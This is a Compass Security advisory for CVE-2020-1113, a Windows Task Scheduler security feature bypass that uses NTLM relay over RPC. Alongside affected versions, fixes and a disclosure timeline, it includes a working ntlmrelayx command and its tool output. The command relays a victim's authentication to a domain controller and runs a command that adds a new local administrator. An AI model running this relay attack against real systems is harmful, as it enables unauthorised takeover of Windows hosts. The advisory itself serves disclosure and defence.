Microsoft Windows Task Scheduler Security Feature Bypass

Compass Security identified a security feature bypass vulnerability in Microsoft Windows. Due to the absence of integrity verification requirements for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle attacker can relay his victim's NTLM authentication to a target of his choice over the RPC protocol. Provided the victim has administrative privileges on the target, the attacker can execute code on the remote target.


MD5 | 9657b7615782fe7083c7fe7350cc206a

################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: Windows Task Scheduler
# Vendor: Microsoft
# CSNC ID: CSNC-2010-001
# CVE ID: CVE-2020-1113
# Subject: Security Feature Bypass
# Risk: High
# Effect: Remotely exploitable
# Authors: Sylvain Heiniger <[email protected]>
# Date: 14.05.2020
#
################################################################################

Introduction:
-------------
NTLM relay attacks are well-known for privilege escalation in Windows networks.

Compass Security identified a security feature bypass vulnerability in
Microsoft Windows. Due to the absence of integrity verification requirements
for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle
attacker can relay his victim's NTLM authentication to a target of his choice
over the RPC protocol. Provided the victim has administrative privileges on
the target, the attacker can execute code on the remote target.

Affected:
---------
Vulnerable:
* Windows 7
* Windows 8.1
* Windows 10
* Windows Server 2008
* Windows Server 2008 R2
* Windows Server 2012
* Windows Server 2016
* Windows Server 2019

For details about the affected versions and the relevant update, please refer
to Microsoft's website [1].

Technical Description:
----------------------
To the best of our knowledge, there is currently no way to require signing on
RPC connections hence relay attacks can be performed over RPC. A hardened
system where a classical SMB relay attack would fail is still vulnerable to an
attacker who can relay HTTP, SMB or RPC connections to RPC.

MS-TSCH is the protocol to manage scheduled tasks. The protocol does not
specify any requirement for the server in terms of checking integrity of
received data.

Our modified version of impacket [2] includes a new RPCRelayServer and
RPCRelayClient as well as an RPCAttack (based on ATExec). In our setup, the
attacker machine has the IP 172.16.100.21 while the victim machine DC is a
Windows Server 2016 with the IP 172.16.100.1.

We run the ntmlrelayx tool with arguments -t and -c to specify your target and
command
# ntlmrelayx.py -ip 0.0.0.0 -t rpc://172.16.100.1 -c "net user compass
StrongPass.123 /add && net localgroup Administrators compass /add"
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Running in relay mode to single host
[*] Setting up RPC Server
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
...

Trigger a connection to the attacker machine. In this case the user
WINLAB\scooper-da, who is in the local Administrators group of the DC machine,
makes an SMB connection from the machine with IP 172.16.100.14 to the attacker
machine on IP 172.16.100.21.
# net view \\172.16.100.21\noshare\

The tool picks up the connection and relays it:
...
[*] SMBD-Thread-4: Received connection from 172.16.100.14, attacking
target rpc://172.16.100.1
[*] Authenticating against rpc://172.16.100.1 as WINLAB\scooper-da SUCCEED
[*] Trying to execute specified command (net user compass StrongPass.123
/add && net localgroup Administrators compass /add)
[*] Creating task \WeumPsdH
[*] Running task \WeumPsdH
[*] Deleting task \WeumPsdH

As a result, the given command is executed (through a scheduled task) and a
new local administrator is created.

Workaround / Fix:
-----------------
* Patch your Windows.
* Enforce packet signing for clients and servers via GPO.
* Check you Active Directory ACLs: Least privilege principle should be used.
* Network segmentation can help prevent relaying attacks.

Timeline:
---------
2020-01-27: Discovery by Sylvain Heiniger
2020-01-29: Initial vendor notification
2020-01-29: Initial vendor response
2020-02-13: Vendor acknowledgement
2020-04-16: CVE-2020-1113 assigned
2020-05-12: Release of fixed version as part of Patch Tuesday [1]
2020-05-14: Public disclosure
2020-06-14: Proof-of-concept code disclosure [3]

References:
-----------
[1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1113
[2] https://github.com/SecureAuthCorp/impacket
[3] https://github.com/CompassSecurity/impacket



Related Posts